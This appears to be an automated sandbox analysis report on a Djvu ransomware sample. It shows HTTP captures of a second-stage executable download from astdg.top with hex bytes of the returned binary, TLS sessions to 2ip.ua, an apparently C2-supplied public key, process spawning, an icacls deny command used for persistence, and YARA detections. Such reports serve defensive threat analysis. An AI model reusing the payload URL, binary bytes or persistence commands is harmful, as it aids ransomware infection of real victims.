                                                                                                                                                                                                    Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2ConnkmHf3F5UYxtsjHW\\nSiM2IvLtvv4J1\/ft1bhz0esbAqY+vEkCsZk01XKhCmgnDWI7UbJRHpe1O6z4AUmI\\nDnZleNmpbjcnpQQf\/AJsji8cGQBN7M9Emo2bQA5c6hXkvjtWR4M4vl7BjYJ9jtLB\\nVPHbk2ycWgGrzLt1oJjcg6wqDaloxbSgYPTlTKJf7XV8mmHVd9\/Z\/Jxp7QvuLbw2\\nNoyha2bP9UrfGnQFruqKfv0VD33O++D\/k\/+XXqhTOuI7V8D353lJ\/wVjQ9GMlS8d\\nlr9BP5EjT5G5sfmFRugSg2vIx2Afdmq6CSWzGDea6amEaGDJBeENnw8fdGcnzPKP\\ntwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB"}


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    2192.168.2.34971694.190.187.10280C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.479751110 CEST1813OUTGET /files/1/build3.exe HTTP/1.1
                                                                                                                                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                                                                                                                                    Host: astdg.top
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.754343033 CEST1814INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Mon, 30 Aug 2021 08:14:00 GMT
                                                                                                                                                                                                    Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                                                                                                                    Last-Modified: Fri, 30 Jul 2021 22:50:56 GMT
                                                                                                                                                                                                    ETag: "53c00-5c85f0d6fa061"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Content-Length: 343040
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 30 61 35 58 74 00 5b 0b 74 00 5b 0b 74 00 5b 0b 6a 52 ce 0b 61 00 5b 0b 6a 52 d8 0b 08 00 5b 0b 6a 52 df 0b 4c 00 5b 0b 53 c6 20 0b 73 00 5b 0b 74 00 5a 0b e5 00 5b 0b 6a 52 d1 0b 75 00 5b 0b 6a 52 cf 0b 75 00 5b 0b 6a 52 ca 0b 75 00 5b 0b 52 69 63 68 74 00 5b 0b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 37 c9 da 5e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 fa 01 00 00 ac e2 02 00 00 00 00 c0 1b 00 00 00 10 00 00 00 10 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 e4 02 00 04 00 00 e2 55 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 95 02 00 50 00 00 00 00 40 e3 02 f0 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e3 02 34 1a 00 00 60 12 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 18 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 f9 01 00 00 10 00 00 00 fa 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 91 00 00 00 10 02 00 00 92 00 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 8c e0 02 00 b0 02 00 00 12 01 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 56 00 00 00 40 e3 02 00 58 00 00 00 a2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 40 01 00 00 a0 e3 02 00 42 01 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8b ff 55 8b ec 51 8b 45 0c 50 8b 4d 08 51 ff 15 0c 11 42 00 85 c0 75 0b ff 15 08 11 42 00 89 45 fc eb 07 c7
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$0a5Xt[t[t[jRa[jR[jRL[S s[tZ[jRu[jRu[jRu[Richt[PEL7^@U`P@V4`@.textp `.rdata@@.data8@.rsrcV@X@@.reloc@B@BUQEPMQBuBE
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.757198095 CEST1816INData Raw: 45 fc 00 00 00 00 83 7d fc 00 74 11 8b 55 fc 52 e8 67 33 00 00 83 c4 04 83 c8 ff eb 02 33 c0 8b e5 5d c3 cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 51 89 4d fc 8b 4d fc e8 4f 01 00 00 8b 45 08 83 e0 01 74 0c 8b 4d fc 51 e8 7e 08 00 00 83 c4 04 8b
                                                                                                                                                                                                    Data Ascii: E}tURg33]UQMMOEtMQ~E]UMEBM9tJUP6EMQwUBExtMREPMQR3E@MAE]U
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.810872078 CEST1817INData Raw: 8b 4d f0 8a 11 88 55 e3 8b 45 f0 83 c0 01 89 45 f0 8b 45 14 99 52 50 6a ff 6a ff e8 b2 47 00 00 89 45 e4 89 55 e8 6a 04 0f b6 4d e3 51 8d 4d d0 e8 4d 03 00 00 50 e8 27 3a 00 00 83 c4 0c 85 c0 74 0c 0f be 55 e3 83 ea 30 89 55 ec eb 54 68 03 01 00
                                                                                                                                                                                                    Data Ascii: MUEEERPjjGEUjMQMMP':tU0UThEPM"P9t0Ma|UzE EMMU7UE;ErMMU;UrLwE;ErBM;Mu^U;UuVu3ERPjjdFu}
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.811096907 CEST1818INData Raw: 35 00 00 83 c4 0c 89 45 bc eb 1d 6a 08 8b 45 08 0f b6 08 51 8d 4d d8 e8 2c fe ff ff 50 e8 06 35 00 00 83 c4 0c 89 45 bc 83 7d bc 00 74 0b 8b 55 08 83 c2 01 89 55 08 eb 94 8d 4d d8 e8 07 fe ff ff 50 6a 00 6a 00 8b 45 08 50 e8 a9 2c 00 00 83 c4 04
                                                                                                                                                                                                    Data Ascii: 5EjEQM,P5E}tUUMPjjEP,PMQURh]@]ME]UjEP]UQMEBMQUo]UQMMEtMQnE]
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.813018084 CEST1820INData Raw: 00 83 c4 14 89 45 fc 83 7d fc 00 75 04 33 c0 eb 57 8b 45 f0 2b 45 f8 c1 f8 02 8b 4d fc 8d 14 81 89 55 f0 8b 45 fc 89 45 f8 8b 4d f8 51 e8 7c 4a 00 00 83 c4 04 a3 28 2c 23 03 8b 55 08 52 e8 6b 4a 00 00 83 c4 04 8b 4d f0 89 01 8b 55 f0 83 c2 04 89
                                                                                                                                                                                                    Data Ascii: E}u3WE+EMUEEMQ|J(,#URkJMUUEPQJ$,#E]UEP"]UQhhBjjj EEPI(,#(,#$,#}uU3]U
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.813460112 CEST1821INData Raw: 55 08 8b 45 dc 8d 4c 10 20 51 e8 45 81 00 00 83 c4 0c 8b 55 08 52 0f b6 05 3b b0 42 00 50 8b 4d dc 83 c1 20 51 e8 2a 81 00 00 83 c4 0c 8b 55 dc 83 c2 20 89 55 e0 c7 45 fc fe ff ff ff e8 02 00 00 00 eb 0b 6a 04 e8 c9 50 00 00 83 c4 04 c3 8b 45 e0
                                                                                                                                                                                                    Data Ascii: UEL QEUR;BPM Q*U UEjPEMdY_^[]U}vk3u;EEu!hBjhHhBj-u}u-jhHhBhpBhB+3KUUUEPMQUR
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.867439032 CEST1823INData Raw: cc eb 64 8b 4d f4 8b 51 14 81 e2 ff ff 00 00 83 fa 02 75 14 8b 45 10 25 ff ff 00 00 83 f8 01 75 07 c7 45 10 02 00 00 00 8b 4d f4 8b 15 6c be 43 00 3b 51 10 73 31 8b 45 08 50 68 a4 17 42 00 6a 00 6a 00 6a 00 6a 01 e8 3e 7e 00 00 83 c4 18 83 f8 01
                                                                                                                                                                                                    Data Ascii: dMQuE%uEMlC;Qs1EPhBjjjj>~u3}t%U$REP}E}u3_#M$QURE}u3:3u0B0B}u|=lCs9UlC+BlC+lC;M
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.867476940 CEST1824INData Raw: e8 0b 05 00 00 83 c4 0c 85 c0 0f 85 92 00 00 00 8b 55 fc 83 7a 08 00 74 4d 8b 45 fc 8b 48 0c 51 8b 55 fc 8b 42 08 50 8b 4d fc 83 c1 20 51 8b 55 fc 8b 42 18 50 8b 4d fc 8b 51 14 81 e2 ff ff 00 00 8b 04 95 18 15 42 00 50 68 e8 1c 42 00 6a 00 6a 00
                                                                                                                                                                                                    Data Ascii: UztMEHQUBPM QUBPMQBPhBjjjjx(u<U REHQUB%BQhXBjjjjx uj8BPMQEL QQUztMEHQUBPM QUBPM
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.868645906 CEST1826INData Raw: 83 c0 01 89 45 08 3b ca 74 07 c7 45 fc 00 00 00 00 eb d0 8b 45 fc 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b ff 55 8b ec 6a fe 68 f0 8e 42 00 68 40 76 40 00 64 a1 00 00 00 00 50 83 c4 e0 53 56 57 a1 a8 b2 42 00 31 45 f8 33 c5 50 8d 45 f0
                                                                                                                                                                                                    Data Ascii: E;tEE]UjhBh@v@dPSVWB1E3PEd(Buj@EE}}MMUU}E$(9@hP BhBjjjjCsuh, BhBjjjj
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.868683100 CEST1827INData Raw: 17 00 00 83 c4 14 a1 28 b0 42 00 eb 73 6a 04 e8 d8 3b 00 00 83 c4 04 c7 45 fc 00 00 00 00 8b 0d 28 b0 42 00 89 4d e4 83 7d 08 ff 74 37 8b 55 08 83 e2 04 74 0c c7 05 8c be 43 00 01 00 00 00 eb 10 8b 45 08 c1 f8 10 25 ff ff 00 00 a3 8c be 43 00 c7
                                                                                                                                                                                                    Data Ascii: (Bsj;E(BM}t7UtCE%CtCM(BEj;EMdY_^[]U3}]UQ}u3jj E Pu3h=+#uIM Qm{
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.870253086 CEST1828INData Raw: f9 04 0f 85 83 00 00 00 8b 55 e4 8b 42 10 50 8b 4d e4 8b 51 14 c1 fa 10 81 e2 ff ff 00 00 52 8b 45 e4 83 c0 20 50 68 2c 23 42 00 6a 00 6a 00 6a 00 6a 00 e8 6a 69 00 00 83 c4 20 83 f8 01 75 01 cc 83 3d 80 be 43 00 00 74 2c 6a 01 8b 55 e4 83 c2 20
                                                                                                                                                                                                    Data Ascii: UBPMQRE Ph,#Bjjjjji u=Ct,jU RBuEHQU RCEPMQUzu;EHQU Rh#BjjjjhuMQURZEHuIUBPMQ


                                                                                                                                                                                                    HTTPS Packets

                                                                                                                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                    Aug 30, 2021 10:14:13.178024054 CEST77.123.139.190443192.168.2.349708CN=*.2ip.ua CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Nov 21 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019 Thu Jan 01 01:00:00 CET 2004Thu Dec 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                    CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                                                                    CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                                                    CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                                                    Aug 30, 2021 10:14:17.348249912 CEST77.123.139.190443192.168.2.349709CN=*.2ip.ua CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Nov 21 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019 Thu Jan 01 01:00:00 CET 2004Thu Dec 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                    CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                                                                    CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                                                    CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                                                    Aug 30, 2021 10:14:19.740149021 CEST77.123.139.190443192.168.2.349712CN=*.2ip.ua CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Nov 21 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019 Thu Jan 01 01:00:00 CET 2004Thu Dec 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                    CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                                                                    CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                                                    CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                                                                                                                                                                                                    Code Manipulations

                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                    Analysis Process: Ln0LqSBLhS.exe PID: 6484 Parent PID: 4244

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:10
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Users\user\Desktop\Ln0LqSBLhS.exe'
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:701952 bytes
                                                                                                                                                                                                    MD5 hash:D600BEAC1E021639E589DD8CC6E428EB
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.235789866.0000000003C40000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: Ln0LqSBLhS.exe PID: 6536 Parent PID: 6484

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:11
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Users\user\Desktop\Ln0LqSBLhS.exe'
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:701952 bytes
                                                                                                                                                                                                    MD5 hash:D600BEAC1E021639E589DD8CC6E428EB
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000003.00000001.234275088.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000001.234275088.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000002.240801455.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: icacls.exe PID: 6600 Parent PID: 6536

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:13
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:icacls 'C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749' /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                    Imagebase:0x120000
                                                                                                                                                                                                    File size:29696 bytes
                                                                                                                                                                                                    MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: Ln0LqSBLhS.exe PID: 6632 Parent PID: 6536

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:14
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Users\user\Desktop\Ln0LqSBLhS.exe' --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:701952 bytes
                                                                                                                                                                                                    MD5 hash:D600BEAC1E021639E589DD8CC6E428EB
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: Ln0LqSBLhS.exe PID: 6664 Parent PID: 6632

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:15
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Users\user\Desktop\Ln0LqSBLhS.exe' --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:701952 bytes
                                                                                                                                                                                                    MD5 hash:D600BEAC1E021639E589DD8CC6E428EB
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000001.243226905.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000001.243226905.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: Ln0LqSBLhS.exe PID: 6672 Parent PID: 528

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:15
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe --Task
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:701952 bytes
                                                                                                                                                                                                    MD5 hash:D600BEAC1E021639E589DD8CC6E428EB
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.248521541.0000000003C10000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                    Analysis Process: Ln0LqSBLhS.exe PID: 6780 Parent PID: 6672

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:10:14:17
                                                                                                                                                                                                    Start date:30/08/2021
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\b6f888d4-cc05-4e6a-87b2-00fd6ab00749\Ln0LqSBLhS.exe --Task
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:701952 bytes
                                                                                                                                                                                                    MD5 hash:D600BEAC1E021639E589DD8CC6E428EB
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000002.251711400.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
